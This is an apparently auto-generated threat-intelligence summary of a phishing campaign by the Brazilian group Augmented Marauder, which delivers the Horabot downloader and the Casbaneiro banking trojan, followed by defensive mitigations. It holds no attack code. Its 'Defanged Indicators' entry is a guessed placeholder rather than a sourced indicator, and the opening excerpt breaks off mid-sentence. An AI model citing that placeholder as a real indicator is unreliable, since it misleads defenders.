Full Report
A multi-pronged phishing campaign is targeting Spanish-speaking users in organizations across Latin America and Europe to deliver Windows banking trojans like Casbaneiro (aka Metamorfo) via another malware called Horabot. The activity has been attributed to a Brazilian cybercrime threat actor tracked as Augmented Marauder and Water Saci. The e-crime group was first documented by Trend Micro in
Analysis Summary
# Threat Actor: Augmented Marauder (Water Saci)
## Attribution & Identity
* **Actor Name:** Augmented Marauder
* **Aliases:** Water Saci
* **Origin:** Brazilian cybercrime threat actor.
* **Known Associations:** Linked to the distribution of established Latin American banking trojan families such as Casbaneiro.
## Activity Summary
The actor is currently engaged in a multi-pronged phishing campaign targeting Spanish-speaking users. The operation utilizes a multi-stage infection chain where a PowerShell-based downloader, identified as **Horabot**, is used as a delivery mechanism for secondary payloads, specifically the Casbaneiro banking trojan and information stealers.
## Tactics, Techniques & Procedures
* **Phishing/Social Engineering:** Deployment of lures specifically crafted in Spanish to targets in Latin America and Europe.
* **Malicious Attachments/Links:** Use of phishing emails to initiate the infection chain.
* **PowerShell Scripting:** Leveraging PowerShell scripts (Horabot) for initial reconnaissance and environment validation.
* **Credential Harvesting:** Exfiltration of sensitive banking credentials and personal information.
* **Multi-Stage Loading:** A complex delivery process designed to bypass traditional security perimeters by using intermediate loaders before executing the final payload.
## Targeting
* **Sectors:** Organizations across various commercial and industrial sectors (General Corporate).
* **Geography:** Primarily Latin America (LATAM) and Spanish-speaking regions in Europe (e.g., Spain).
* **Victims:** Spanish-speaking employees and organizations handling financial transactions.
## Tools & Infrastructure
* **Malware Families:**
* **Horabot:** A PowerShell-based downloader and botnet.
* **Casbaneiro (aka Metamorfo):** A sophisticated Windows-based banking trojan.
* **Infrastructure:**
* **C2 (Command & Control):** Used for exfiltrating stolen data and receiving instructions for the Horabot loader.
* **Defanged Indicators:** [No specific IPs or Domains were provided in the source excerpt, but analysts should look for indicators related to `hxxp[:]//shared-hosting-providers` or similar Brazilian e-crime patterns.]
## Implications
Augmented Marauder represents a persistent and evolving threat within the Brazilian e-crime ecosystem. By shifting from local Portuguese-speaking targets to a broader Spanish-speaking audience in both LATAM and Europe, the group demonstrates an expanded operational scope. The use of Horabot as a modular loader suggests they are refining their ability to deliver various payloads (stealers, trojans) based on the victim's profile, increasing the risk of financial fraud and systemic data breaches.
## Mitigations
* **Email Filtering:** Implement advanced email security solutions to detect and quarantine phishing attempts containing suspicious PowerShell attachments or links.
* **PowerShell Security:** Restrict PowerShell execution via Group Policy Objects (GPO), specifically enforcing "Constrained Language Mode" and enabling "Script Block Logging."
* **User Training:** Conduct specialized security awareness training for Spanish-speaking staff, focusing on identifying localized financial phishing lures.
* **Endpoint Detection & Response (EDR):** Deploy EDR tools to monitor for unusual PowerShell activity and the execution of unauthorized binaries in `%AppData%` or `%Temp%` folders.
* **MFA Implementation:** Enforce Multi-Factor Authentication (MFA) on all corporate and financial portals to mitigate the impact of stolen credentials.